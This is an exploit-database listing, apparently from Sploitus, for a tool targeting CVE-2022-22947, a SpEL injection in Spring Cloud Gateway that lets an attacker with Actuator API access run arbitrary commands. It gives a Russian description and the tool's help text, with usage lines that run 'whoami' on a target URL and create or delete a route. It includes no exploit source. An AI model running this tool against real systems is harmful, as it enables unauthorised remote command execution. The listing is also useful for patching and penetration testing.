Sploitus

Exploit for cve-2022-22947 CVE-2022-22947

kitploit · 2026-08-28

Exploit Code

MARKDOWN28 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DARKB1RD-CVE-2022-22947
# cve-2022-22947

`Spring Cloud Gateway` — это API-шлюз в Spring. В версиях 3.1.0 и 3.0.6 (включительно) и ранее существует уязвимость внедрения SpEL-выражений, которая позволяет злоумышленнику выполнять произвольные команды при наличии доступа к Actuator API.

**Использование:**

root@kitploit:~
    
    
    ➜ ./cve-2022-22947 -h
    Usage of cve-2022-22947:
      -c string
        	Execute command, Example: whoami (default "id")
      -d	Delete route.
      -r string
        	New route name
      -u string
        	Target Url, Example: http://127.0.0.1:8080
    
    # пример
    
    [>] Usage: ./CVE-2022-22947 -u http://127.0.0.1:8080 -c whoami -r exploit.
    [>] Usage: ./CVE-2022-22947 -u http://127.0.0.1:8080 -r exploit -d
    
    

**Возникшая проблема:** https://darkb1rd.github.io/2022/03/07/yuque/cve-2022-22947%20%E5%B0%8F%E7%82%B9/